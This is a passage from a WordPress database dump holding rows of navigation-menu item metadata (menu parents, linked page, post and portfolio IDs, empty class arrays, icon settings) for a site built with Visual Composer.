_item_parent','3756'),(43512,3866,'_menu_item_object_id','1742'),(43513,3866,'_menu_item_object','page'),(43514,3866,'_menu_item_target',''),(43515,3866,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43516,3866,'_menu_item_xfn',''),(43517,3866,'_menu_item_url',''),(43518,3866,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43519,3866,'_menu_item_icon','null'),(43520,3867,'_menu_item_type','post_type'),(43521,3867,'_menu_item_menu_item_parent','3751'),(43522,3867,'_menu_item_object_id','1804'),(43523,3867,'_menu_item_object','page'),(43524,3867,'_menu_item_target',''),(43525,3867,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43526,3867,'_menu_item_xfn',''),(43527,3867,'_menu_item_url',''),(43528,3867,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43529,3867,'_menu_item_icon','null'),(43530,3868,'_menu_item_type','post_type'),(43531,3868,'_menu_item_menu_item_parent','3755'),(43532,3868,'_menu_item_object_id','1804'),(43533,3868,'_menu_item_object','page'),(43534,3868,'_menu_item_target',''),(43535,3868,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43536,3868,'_menu_item_xfn',''),(43537,3868,'_menu_item_url',''),(43538,3868,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43539,3868,'_menu_item_icon','null'),(43540,3869,'_menu_item_type','post_type'),(43541,3869,'_menu_item_menu_item_parent','3734'),(43542,3869,'_menu_item_object_id','3053'),(43543,3869,'_menu_item_object','page'),(43544,3869,'_menu_item_target',''),(43545,3869,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43546,3869,'_menu_item_xfn',''),(43547,3869,'_menu_item_url',''),(43548,3869,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43549,3870,'_menu_item_type','post_type'),(43550,3870,'_menu_item_menu_item_parent','3734'),(43551,3870,'_menu_item_object_id','3055'),(43552,3870,'_menu_item_object','page'),(43553,3870,'_menu_item_target',''),(43554,3870,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43555,3870,'_menu_item_xfn',''),(43556,3870,'_menu_item_url',''),(43557,3870,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43558,3871,'_menu_item_type','post_type'),(43559,3871,'_menu_item_menu_item_parent','3753'),(43560,3871,'_menu_item_object_id','1836'),(43561,3871,'_menu_item_object','page'),(43562,3871,'_menu_item_target',''),(43563,3871,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43564,3871,'_menu_item_xfn',''),(43565,3871,'_menu_item_url',''),(43566,3871,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43567,3871,'_menu_item_icon','null'),(43568,3872,'_menu_item_type','post_type'),(43569,3872,'_menu_item_menu_item_parent','3754'),(43570,3872,'_menu_item_object_id','1827'),(43571,3872,'_menu_item_object','page'),(43572,3872,'_menu_item_target',''),(43573,3872,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43574,3872,'_menu_item_xfn',''),(43575,3872,'_menu_item_url',''),(43576,3872,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43577,3872,'_menu_item_icon','null'),(43578,3873,'_menu_item_type','post_type'),(43579,3873,'_menu_item_menu_item_parent','3757'),(43580,3873,'_menu_item_object_id','1836'),(43581,3873,'_menu_item_object','page'),(43582,3873,'_menu_item_target',''),(43583,3873,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43584,3873,'_menu_item_xfn',''),(43585,3873,'_menu_item_url',''),(43586,3873,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43587,3873,'_menu_item_icon','null'),(43588,3874,'_menu_item_type','post_type'),(43589,3874,'_menu_item_menu_item_parent','3758'),(43590,3874,'_menu_item_object_id','1827'),(43591,3874,'_menu_item_object','page'),(43592,3874,'_menu_item_target',''),(43593,3874,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43594,3874,'_menu_item_xfn',''),(43595,3874,'_menu_item_url',''),(43596,3874,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43597,3874,'_menu_item_icon','null'),(43598,3875,'_menu_item_type','post_type'),(43599,3875,'_menu_item_menu_item_parent','3735'),(43600,3875,'_menu_item_object_id','3054'),(43601,3875,'_menu_item_object','page'),(43602,3875,'_menu_item_target',''),(43603,3875,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43604,3875,'_menu_item_xfn',''),(43605,3875,'_menu_item_url',''),(43606,3875,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43607,3876,'_menu_item_type','post_type'),(43608,3876,'_menu_item_menu_item_parent','3735'),(43609,3876,'_menu_item_object_id','3052'),(43610,3876,'_menu_item_object','page'),(43611,3876,'_menu_item_target',''),(43612,3876,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43613,3876,'_menu_item_xfn',''),(43614,3876,'_menu_item_url',''),(43615,3876,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43616,3877,'_menu_item_type','post_type'),(43617,3877,'_menu_item_menu_item_parent','3735'),(43618,3877,'_menu_item_object_id','3051'),(43619,3877,'_menu_item_object','page'),(43620,3877,'_menu_item_target',''),(43621,3877,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43622,3877,'_menu_item_xfn',''),(43623,3877,'_menu_item_url',''),(43624,3877,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43625,3878,'_menu_item_type','post_type'),(43626,3878,'_menu_item_menu_item_parent','3735'),(43627,3878,'_menu_item_object_id','3049'),(43628,3878,'_menu_item_object','page'),(43629,3878,'_menu_item_target',''),(43630,3878,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43631,3878,'_menu_item_xfn',''),(43632,3878,'_menu_item_url',''),(43633,3878,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43634,3879,'_menu_item_type','post_type'),(43635,3879,'_menu_item_menu_item_parent','3737'),(43636,3879,'_menu_item_object_id','3065'),(43637,3879,'_menu_item_object','page'),(43638,3879,'_menu_item_target',''),(43639,3879,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43640,3879,'_menu_item_xfn',''),(43641,3879,'_menu_item_url',''),(43642,3879,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43643,3880,'_menu_item_type','post_type'),(43644,3880,'_menu_item_menu_item_parent','3737'),(43645,3880,'_menu_item_object_id','3066'),(43646,3880,'_menu_item_object','page'),(43647,3880,'_menu_item_target',''),(43648,3880,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43649,3880,'_menu_item_xfn',''),(43650,3880,'_menu_item_url',''),(43651,3880,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43652,3881,'_menu_item_type','post_type'),(43653,3881,'_menu_item_menu_item_parent','3737'),(43654,3881,'_menu_item_object_id','3067'),(43655,3881,'_menu_item_object','page'),(43656,3881,'_menu_item_target',''),(43657,3881,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43658,3881,'_menu_item_xfn',''),(43659,3881,'_menu_item_url',''),(43660,3881,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43661,3882,'_menu_item_type','post_type'),(43662,3882,'_menu_item_menu_item_parent','3738'),(43663,3882,'_menu_item_object_id','1679'),(43664,3882,'_menu_item_object','page'),(43665,3882,'_menu_item_target',''),(43666,3882,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43667,3882,'_menu_item_xfn',''),(43668,3882,'_menu_item_url',''),(43669,3882,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43670,3883,'_menu_item_type','post_type'),(43671,3883,'_menu_item_menu_item_parent','3738'),(43672,3883,'_menu_item_object_id','3770'),(43673,3883,'_menu_item_object','post'),(43674,3883,'_menu_item_target',''),(43675,3883,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43676,3883,'_menu_item_xfn',''),(43677,3883,'_menu_item_url',''),(43678,3883,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43679,3884,'_menu_item_type','post_type'),(43680,3884,'_menu_item_menu_item_parent','3738'),(43681,3884,'_menu_item_object_id','1685'),(43682,3884,'_menu_item_object','post'),(43683,3884,'_menu_item_target',''),(43684,3884,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43685,3884,'_menu_item_xfn',''),(43686,3884,'_menu_item_url',''),(43687,3884,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43688,3885,'_menu_item_type','post_type'),(43689,3885,'_menu_item_menu_item_parent','3742'),(43690,3885,'_menu_item_object_id','3770'),(43691,3885,'_menu_item_object','post'),(43692,3885,'_menu_item_target',''),(43693,3885,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43694,3885,'_menu_item_xfn',''),(43695,3885,'_menu_item_url',''),(43696,3885,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43697,3886,'_menu_item_type','post_type'),(43698,3886,'_menu_item_menu_item_parent','3742'),(43699,3886,'_menu_item_object_id','1685'),(43700,3886,'_menu_item_object','post'),(43701,3886,'_menu_item_target',''),(43702,3886,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43703,3886,'_menu_item_xfn',''),(43704,3886,'_menu_item_url',''),(43705,3886,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43706,3887,'_menu_item_type','post_type'),(43707,3887,'_menu_item_menu_item_parent','3742'),(43708,3887,'_menu_item_object_id','1679'),(43709,3887,'_menu_item_object','page'),(43710,3887,'_menu_item_target',''),(43711,3887,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43712,3887,'_menu_item_xfn',''),(43713,3887,'_menu_item_url',''),(43714,3887,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43715,3888,'_menu_item_type','post_type'),(43716,3888,'_menu_item_menu_item_parent','3740'),(43717,3888,'_menu_item_object_id','3054'),(43718,3888,'_menu_item_object','page'),(43719,3888,'_menu_item_target',''),(43720,3888,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43721,3888,'_menu_item_xfn',''),(43722,3888,'_menu_item_url',''),(43723,3888,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43724,3889,'_menu_item_type','post_type'),(43725,3889,'_menu_item_menu_item_parent','3740'),(43726,3889,'_menu_item_object_id','3052'),(43727,3889,'_menu_item_object','page'),(43728,3889,'_menu_item_target',''),(43729,3889,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43730,3889,'_menu_item_xfn',''),(43731,3889,'_menu_item_url',''),(43732,3889,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43733,3890,'_menu_item_type','post_type'),(43734,3890,'_menu_item_menu_item_parent','3740'),(43735,3890,'_menu_item_object_id','3049'),(43736,3890,'_menu_item_object','page'),(43737,3890,'_menu_item_target',''),(43738,3890,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43739,3890,'_menu_item_xfn',''),(43740,3890,'_menu_item_url',''),(43741,3890,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43742,3891,'_menu_item_type','post_type'),(43743,3891,'_menu_item_menu_item_parent','3740'),(43744,3891,'_menu_item_object_id','3043'),(43745,3891,'_menu_item_object','page'),(43746,3891,'_menu_item_target',''),(43747,3891,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43748,3891,'_menu_item_xfn',''),(43749,3891,'_menu_item_url',''),(43750,3891,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43751,3892,'_menu_item_type','post_type'),(43752,3892,'_menu_item_menu_item_parent','3757'),(43753,3892,'_menu_item_object_id','1857'),(43754,3892,'_menu_item_object','page'),(43755,3892,'_menu_item_target',''),(43756,3892,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43757,3892,'_menu_item_xfn',''),(43758,3892,'_menu_item_url',''),(43759,3892,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43760,3892,'_menu_item_icon','null'),(43761,3893,'_menu_item_type','post_type'),(43762,3893,'_menu_item_menu_item_parent','3757'),(43763,3893,'_menu_item_object_id','1852'),(43764,3893,'_menu_item_object','page'),(43765,3893,'_menu_item_target',''),(43766,3893,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43767,3893,'_menu_item_xfn',''),(43768,3893,'_menu_item_url',''),(43769,3893,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43770,3893,'_menu_item_icon','null'),(43771,3894,'_menu_item_type','post_type'),(43772,3894,'_menu_item_menu_item_parent','3753'),(43773,3894,'_menu_item_object_id','1857'),(43774,3894,'_menu_item_object','page'),(43775,3894,'_menu_item_target',''),(43776,3894,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43777,3894,'_menu_item_xfn',''),(43778,3894,'_menu_item_url',''),(43779,3894,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43780,3894,'_menu_item_icon','null'),(43781,3895,'_menu_item_type','post_type'),(43782,3895,'_menu_item_menu_item_parent','3753'),(43783,3895,'_menu_item_object_id','1852'),(43784,3895,'_menu_item_object','page'),(43785,3895,'_menu_item_target',''),(43786,3895,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43787,3895,'_menu_item_xfn',''),(43788,3895,'_menu_item_url',''),(43789,3895,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43790,3895,'_menu_item_icon','null'),(43791,3896,'_menu_item_type','post_type'),(43792,3896,'_menu_item_menu_item_parent','3758'),(43793,3896,'_menu_item_object_id','3074'),(43794,3896,'_menu_item_object','page'),(43795,3896,'_menu_item_target',''),(43796,3896,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43797,3896,'_menu_item_xfn',''),(43798,3896,'_menu_item_url',''),(43799,3896,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43800,3896,'_menu_item_icon','null'),(43801,3897,'_menu_item_type','post_type'),(43802,3897,'_menu_item_menu_item_parent','3754'),(43803,3897,'_menu_item_object_id','3074'),(43804,3897,'_menu_item_object','page'),(43805,3897,'_menu_item_target',''),(43806,3897,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43807,3897,'_menu_item_xfn',''),(43808,3897,'_menu_item_url',''),(43809,3897,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43810,3897,'_menu_item_icon','null'),(43811,3898,'_menu_item_type','post_type'),(43812,3898,'_menu_item_menu_item_parent','3752'),(43813,3898,'_menu_item_object_id','1995'),(43814,3898,'_menu_item_object','page'),(43815,3898,'_menu_item_target',''),(43816,3898,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43817,3898,'_menu_item_xfn',''),(43818,3898,'_menu_item_url',''),(43819,3898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43820,3898,'_menu_item_icon','null'),(43821,3899,'_menu_item_type','post_type'),(43822,3899,'_menu_item_menu_item_parent','3756'),(43823,3899,'_menu_item_object_id','1995'),(43824,3899,'_menu_item_object','page'),(43825,3899,'_menu_item_target',''),(43826,3899,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43827,3899,'_menu_item_xfn',''),(43828,3899,'_menu_item_url',''),(43829,3899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43830,3899,'_menu_item_icon','null'),(43831,3900,'_menu_item_type','post_type'),(43832,3900,'_menu_item_menu_item_parent','3723'),(43833,3900,'_menu_item_object_id','3054'),(43834,3900,'_menu_item_object','page'),(43835,3900,'_menu_item_target',''),(43836,3900,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43837,3900,'_menu_item_xfn',''),(43838,3900,'_menu_item_url',''),(43839,3900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43840,3900,'_menu_item_icon','null'),(43841,3901,'_menu_item_type','post_type'),(43842,3901,'_menu_item_menu_item_parent','3723'),(43843,3901,'_menu_item_object_id','3052'),(43844,3901,'_menu_item_object','page'),(43845,3901,'_menu_item_target',''),(43846,3901,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43847,3901,'_menu_item_xfn',''),(43848,3901,'_menu_item_url',''),(43849,3901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43850,3901,'_menu_item_icon','null'),(43851,3902,'_menu_item_type','post_type'),(43852,3902,'_menu_item_menu_item_parent','3723'),(43853,3902,'_menu_item_object_id','3051'),(43854,3902,'_menu_item_object','page'),(43855,3902,'_menu_item_target',''),(43856,3902,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43857,3902,'_menu_item_xfn',''),(43858,3902,'_menu_item_url',''),(43859,3902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43860,3902,'_menu_item_icon','null'),(43861,3903,'_menu_item_type','post_type'),(43862,3903,'_menu_item_menu_item_parent','3723'),(43863,3903,'_menu_item_object_id','3049'),(43864,3903,'_menu_item_object','page'),(43865,3903,'_menu_item_target',''),(43866,3903,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43867,3903,'_menu_item_xfn',''),(43868,3903,'_menu_item_url',''),(43869,3903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43870,3903,'_menu_item_icon','null'),(43871,3904,'_menu_item_type','post_type'),(43872,3904,'_menu_item_menu_item_parent','3723'),(43873,3904,'_menu_item_object_id','3048'),(43874,3904,'_menu_item_object','page'),(43875,3904,'_menu_item_target',''),(43876,3904,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43877,3904,'_menu_item_xfn',''),(43878,3904,'_menu_item_url',''),(43879,3904,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43880,3904,'_menu_item_icon','null'),(43881,3905,'_menu_item_type','post_type'),(43882,3905,'_menu_item_menu_item_parent','3723'),(43883,3905,'_menu_item_object_id','3058'),(43884,3905,'_menu_item_object','page'),(43885,3905,'_menu_item_target',''),(43886,3905,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43887,3905,'_menu_item_xfn',''),(43888,3905,'_menu_item_url',''),(43889,3905,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43890,3905,'_menu_item_icon','null'),(43891,3906,'_menu_item_type','post_type'),(43892,3906,'_menu_item_menu_item_parent','3723'),(43893,3906,'_menu_item_object_id','3059'),(43894,3906,'_menu_item_object','page'),(43895,3906,'_menu_item_target',''),(43896,3906,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43897,3906,'_menu_item_xfn',''),(43898,3906,'_menu_item_url',''),(43899,3906,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43900,3906,'_menu_item_icon','null'),(43901,3907,'_menu_item_type','post_type'),(43902,3907,'_menu_item_menu_item_parent','3723'),(43903,3907,'_menu_item_object_id','3057'),(43904,3907,'_menu_item_object','page'),(43905,3907,'_menu_item_target',''),(43906,3907,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43907,3907,'_menu_item_xfn',''),(43908,3907,'_menu_item_url',''),(43909,3907,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43910,3907,'_menu_item_icon','null'),(43911,3908,'_menu_item_type','post_type'),(43912,3908,'_menu_item_menu_item_parent','3723'),(43913,3908,'_menu_item_object_id','3050'),(43914,3908,'_menu_item_object','page'),(43915,3908,'_menu_item_target',''),(43916,3908,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43917,3908,'_menu_item_xfn',''),(43918,3908,'_menu_item_url',''),(43919,3908,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43920,3908,'_menu_item_icon','null'),(43921,3909,'_menu_item_type','post_type'),(43922,3909,'_menu_item_menu_item_parent','3753'),(43923,3909,'_menu_item_object_id','2019'),(43924,3909,'_menu_item_object','page'),(43925,3909,'_menu_item_target',''),(43926,3909,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43927,3909,'_menu_item_xfn',''),(43928,3909,'_menu_item_url',''),(43929,3909,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43930,3909,'_menu_item_icon','null'),(43931,3910,'_menu_item_type','post_type'),(43932,3910,'_menu_item_menu_item_parent','3757'),(43933,3910,'_menu_item_object_id','2019'),(43934,3910,'_menu_item_object','page'),(43935,3910,'_menu_item_target',''),(43936,3910,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43937,3910,'_menu_item_xfn',''),(43938,3910,'_menu_item_url',''),(43939,3910,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43940,3910,'_menu_item_icon','null'),(43941,3911,'_menu_item_type','post_type'),(43942,3911,'_menu_item_menu_item_parent','3758'),(43943,3911,'_menu_item_object_id','1948'),(43944,3911,'_menu_item_object','page'),(43945,3911,'_menu_item_target',''),(43946,3911,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43947,3911,'_menu_item_xfn',''),(43948,3911,'_menu_item_url',''),(43949,3911,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43950,3911,'_menu_item_icon','null'),(43951,3912,'_menu_item_type','post_type'),(43952,3912,'_menu_item_menu_item_parent','3754'),(43953,3912,'_menu_item_object_id','1948'),(43954,3912,'_menu_item_object','page'),(43955,3912,'_menu_item_target',''),(43956,3912,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43957,3912,'_menu_item_xfn',''),(43958,3912,'_menu_item_url',''),(43959,3912,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43960,3912,'_menu_item_icon','null'),(43961,3913,'_menu_item_type','post_type'),(43962,3913,'_menu_item_menu_item_parent','3751'),(43963,3913,'_menu_item_object_id','2174'),(43964,3913,'_menu_item_object','page'),(43965,3913,'_menu_item_target',''),(43966,3913,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43967,3913,'_menu_item_xfn',''),(43968,3913,'_menu_item_url',''),(43969,3913,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43970,3913,'_menu_item_icon','icon-star'),(43971,3913,'_menu_item_icon_pack','simple_line_icons'),(43972,3914,'_menu_item_type','post_type'),(43973,3914,'_menu_item_menu_item_parent','3755'),(43974,3914,'_menu_item_object_id','2174'),(43975,3914,'_menu_item_object','page'),(43976,3914,'_menu_item_target',''),(43977,3914,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43978,3914,'_menu_item_xfn',''),(43979,3914,'_menu_item_url',''),(43980,3914,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43981,3914,'_menu_item_icon','icon-star'),(43982,3914,'_menu_item_icon_pack','simple_line_icons'),(43983,3915,'_menu_item_type','post_type'),(43984,3915,'_menu_item_menu_item_parent','3732'),(43985,3915,'_menu_item_object_id','1679'),(43986,3915,'_menu_item_object','page'),(43987,3915,'_menu_item_target',''),(43988,3915,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43989,3915,'_menu_item_xfn',''),(43990,3915,'_menu_item_url',''),(43991,3915,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(43992,3915,'_menu_item_icon','null'),(43993,3916,'_menu_item_type','post_type'),(43994,3916,'_menu_item_menu_item_parent','3760'),(43995,3916,'_menu_item_object_id','3770'),(43996,3916,'_menu_item_object','post'),(43997,3916,'_menu_item_target',''),(43998,3916,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(43999,3916,'_menu_item_xfn',''),(44000,3916,'_menu_item_url',''),(44001,3916,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44002,3916,'_menu_item_icon','null'),(44003,3917,'_menu_item_type','post_type'),(44004,3917,'_menu_item_menu_item_parent','3760'),(44005,3917,'_menu_item_object_id','1685'),(44006,3917,'_menu_item_object','post'),(44007,3917,'_menu_item_target',''),(44008,3917,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44009,3917,'_menu_item_xfn',''),(44010,3917,'_menu_item_url',''),(44011,3917,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44012,3917,'_menu_item_icon','null'),(44013,3918,'_menu_item_type','post_type'),(44014,3918,'_menu_item_menu_item_parent','3760'),(44015,3918,'_menu_item_object_id','1677'),(44016,3918,'_menu_item_object','post'),(44017,3918,'_menu_item_target',''),(44018,3918,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44019,3918,'_menu_item_xfn',''),(44020,3918,'_menu_item_url',''),(44021,3918,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44022,3918,'_menu_item_icon','null'),(44023,3919,'_menu_item_type','post_type'),(44024,3919,'_menu_item_menu_item_parent','3760'),(44025,3919,'_menu_item_object_id','1671'),(44026,3919,'_menu_item_object','post'),(44027,3919,'_menu_item_target',''),(44028,3919,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44029,3919,'_menu_item_xfn',''),(44030,3919,'_menu_item_url',''),(44031,3919,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44032,3919,'_menu_item_icon','null'),(44033,3920,'_menu_item_type','post_type'),(44034,3920,'_menu_item_menu_item_parent','3760'),(44035,3920,'_menu_item_object_id','1670'),(44036,3920,'_menu_item_object','post'),(44037,3920,'_menu_item_target',''),(44038,3920,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44039,3920,'_menu_item_xfn',''),(44040,3920,'_menu_item_url',''),(44041,3920,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44042,3920,'_menu_item_icon','null'),(44043,3921,'_menu_item_type','post_type'),(44044,3921,'_menu_item_menu_item_parent','3760'),(44045,3921,'_menu_item_object_id','1681'),(44046,3921,'_menu_item_object','post'),(44047,3921,'_menu_item_target',''),(44048,3921,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44049,3921,'_menu_item_xfn',''),(44050,3921,'_menu_item_url',''),(44051,3921,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44052,3921,'_menu_item_icon','null'),(44053,3922,'_menu_item_type','post_type'),(44054,3922,'_menu_item_menu_item_parent','3759'),(44055,3922,'_menu_item_object_id','3078'),(44056,3922,'_menu_item_object','portfolio-item'),(44057,3922,'_menu_item_target',''),(44058,3922,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44059,3922,'_menu_item_xfn',''),(44060,3922,'_menu_item_url',''),(44061,3922,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44062,3922,'_menu_item_icon','null'),(44063,3923,'_menu_item_type','post_type'),(44064,3923,'_menu_item_menu_item_parent','3739'),(44065,3923,'_menu_item_object_id','3441'),(44066,3923,'_menu_item_object','page'),(44067,3923,'_menu_item_target',''),(44068,3923,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44069,3923,'_menu_item_xfn',''),(44070,3923,'_menu_item_url',''),(44071,3923,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44072,3924,'_menu_item_type','post_type'),(44073,3924,'_menu_item_menu_item_parent','3762'),(44074,3924,'_menu_item_object_id','3075'),(44075,3924,'_menu_item_object','portfolio-item'),(44076,3924,'_menu_item_target',''),(44077,3924,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44078,3924,'_menu_item_xfn',''),(44079,3924,'_menu_item_url',''),(44080,3924,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44081,3924,'_menu_item_icon','null'),(44082,3925,'_menu_item_type','post_type'),(44083,3925,'_menu_item_menu_item_parent','3762'),(44084,3925,'_menu_item_object_id','3076'),(44085,3925,'_menu_item_object','portfolio-item'),(44086,3925,'_menu_item_target',''),(44087,3925,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44088,3925,'_menu_item_xfn',''),(44089,3925,'_menu_item_url',''),(44090,3925,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44091,3925,'_menu_item_icon','null'),(44092,3926,'_menu_item_type','post_type'),(44093,3926,'_menu_item_menu_item_parent','3762'),(44094,3926,'_menu_item_object_id','3077'),(44095,3926,'_menu_item_object','portfolio-item'),(44096,3926,'_menu_item_target',''),(44097,3926,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44098,3926,'_menu_item_xfn',''),(44099,3926,'_menu_item_url',''),(44100,3926,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44101,3926,'_menu_item_icon','null'),(44102,3927,'_menu_item_type','post_type'),(44103,3927,'_menu_item_menu_item_parent','3762'),(44104,3927,'_menu_item_object_id','3078'),(44105,3927,'_menu_item_object','portfolio-item'),(44106,3927,'_menu_item_target',''),(44107,3927,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44108,3927,'_menu_item_xfn',''),(44109,3927,'_menu_item_url',''),(44110,3927,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44111,3927,'_menu_item_icon','null'),(44112,3928,'_menu_item_type','post_type'),(44113,3928,'_menu_it